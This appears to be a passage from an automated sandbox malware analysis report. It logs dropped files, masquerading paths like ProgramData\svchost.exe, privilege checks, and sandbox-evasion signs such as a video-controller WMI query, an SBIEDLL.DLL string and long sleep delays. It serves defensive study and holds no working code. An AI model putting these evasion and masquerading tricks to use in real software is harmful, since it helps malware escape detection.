                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX

                                  Malware Analysis System Evasion

                                  barindex
                                  Source: C:\ProgramData\main.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                                  Source: main.exe, 00000015.00000000.1914340821.0000025EB5A32000.00000002.00000001.01000000.00000022.sdmp, main.exe, 00000015.00000002.1999999146.0000025EB809E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                                  Source: C:\ProgramData\main.exeMemory allocated: 25EB6300000 memory reserve | memory write watch
                                  Source: C:\ProgramData\main.exeMemory allocated: 25ECFD20000 memory reserve | memory write watch
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 922337203685477
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 600000
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 599844
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 599558
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 599406
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 599275
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 599094
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 598950
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 598837
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 598656
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 598498
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 598370
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 598234
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 598103
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 597984
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 597874
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 597746
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 597629
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 597468
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 597148
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 597031
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 596918
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 596783
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 596656
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 596505
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 596375
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 596249
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 596131
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 596011
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 595902
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 595781
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 595672
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 595562
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 595453
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8747
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8554
                                  Source: C:\ProgramData\main.exeWindow / User API: threadDelayed 3645
                                  Source: C:\ProgramData\main.exeWindow / User API: threadDelayed 1349
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6634
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 504
                                  Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 2534
                                  Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 7465
                                  Source: C:\Windows\System32\lsass.exeWindow / User API: threadDelayed 9928
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7225
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2450
                                  Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 7131
                                  Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
                                  Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\_queue.pydJump to dropped file
                                  Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
                                  Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
                                  Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\_brotli.cp310-win_amd64.pydJump to dropped file
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75642\_hashlib.pydJump to dropped file
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75642\select.pydJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78122\select.pydJump to dropped file
                                  Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\_ctypes.pydJump to dropped file
                                  Source: C:\Program Files\Google\Chrome\updater.exeDropped PE file which has not been started: C:\Windows\Temp\gqxqtdeqxchk.sysJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78122\_ctypes.pydJump to dropped file
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75642\_decimal.pydJump to dropped file
                                  Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\nacl\_sodium.pydJump to dropped file
                                  Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\cryptography\hazmat\bindings\_rust.pydJump to dropped file
                                  Source: C:\ProgramData\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Costura\A54E036D2DCD19384E8EA53862E0DD8F\64\sqlite.interop.dllJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78122\_bz2.pydJump to dropped file
                                  Source: C:\ProgramData\Microsoft\hacn.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78002\_hashlib.pydJump to dropped file
                                  Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-file-l1-1-0.dllJump to dropped file
                                  Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\_bz2.pydJump to dropped file
                                  Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\_socket.pydJump to dropped file
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75642\unicodedata.pydJump to dropped file
                                  Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\unicodedata.pydJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78122\python311.dllJump to dropped file
                                  Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
                                  Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
                                  Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75642\_socket.pydJump to dropped file
                                  Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\_lzma.pydJump to dropped file
                                  Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\pyexpat.pydJump to dropped file
                                  Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
                                  Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
                                  Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
                                  Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
                                  Source: C:\ProgramData\Microsoft\hacn.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78002\_lzma.pydJump to dropped file
                                  Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
                                  Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78122\_queue.pydJump to dropped file
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75642\_bz2.pydJump to dropped file
                                  Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
                                  Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\_ssl.pydJump to dropped file
                                  Source: C:\ProgramData\Microsoft\hacn.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78002\_decimal.pydJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78122\unicodedata.pydJump to dropped file
                                  Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\wrapt\_wrappers.cp310-win_amd64.pydJump to dropped file
                                  Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
                                  Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-file-l1-2-0.dllJump to dropped file
                                  Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
                                  Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78122\_lzma.pydJump to dropped file
                                  Source: C:\ProgramData\Microsoft\hacn.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78002\select.pydJump to dropped file
                                  Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-console-l1-1-0.dllJump to dropped file
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75642\python311.dllJump to dropped file
                                  Source: C:\ProgramData\Microsoft\hacn.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78002\_bz2.pydJump to dropped file
                                  Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\_decimal.pydJump to dropped file
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75642\_lzma.pydJump to dropped file
                                  Source: C:\ProgramData\Microsoft\hacn.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78002\python310.dllJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78122\_hashlib.pydJump to dropped file
                                  Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
                                  Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
                                  Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\_pytransform.dllJump to dropped file
                                  Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
                                  Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\_cffi_backend.cp310-win_amd64.pydJump to dropped file
                                  Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78122\_socket.pydJump to dropped file
                                  Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-util-l1-1-0.dllJump to dropped file
                                  Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-file-l2-1-0.dllJump to dropped file
                                  Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
                                  Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78122\_sqlite3.pydJump to dropped file
                                  Source: C:\ProgramData\Microsoft\hacn.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78002\unicodedata.pydJump to dropped file
                                  Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
                                  Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
                                  Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
                                  Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\select.pydJump to dropped file
                                  Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
                                  Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\bcrypt\_bcrypt.pydJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78122\_decimal.pydJump to dropped file
                                  Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
                                  Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
                                  Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
                                  Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78122\_ssl.pydJump to dropped file
                                  Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\_hashlib.pydJump to dropped file
                                  Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
                                  Source: C:\Program Files\Google\Chrome\updater.exeDropped PE file which has not been started: C:\Windows\Temp\wxyubnjmnlae.tmpJump to dropped file
                                  Source: C:\ProgramData\setup.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wxyubnjmnlae.tmpJump to dropped file
                                  Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-string-l1-1-0.dllJump to dropped file
                                  Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
                                  Source: C:\ProgramData\Microsoft\hacn.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78002\_socket.pydJump to dropped file
                                  Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI49442\python310.dllJump to dropped file
                                  Source: C:\ProgramData\Microsoft\hacn.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                                  Source: C:\ProgramData\Microsoft\based.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-17263
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeAPI coverage: 2.2 %
                                  Source: C:\ProgramData\Microsoft\based.exeAPI coverage: 9.0 %
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7292Thread sleep count: 8747 > 30
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7292Thread sleep count: 221 > 30
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5740Thread sleep time: -5534023222112862s >= -30000s
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5904Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7288Thread sleep count: 8554 > 30
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7288Thread sleep count: 183 > 30
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3060Thread sleep time: -7378697629483816s >= -30000s
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3452Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\ProgramData\main.exe TID: 7908Thread sleep time: -14757395258967632s >= -30000s
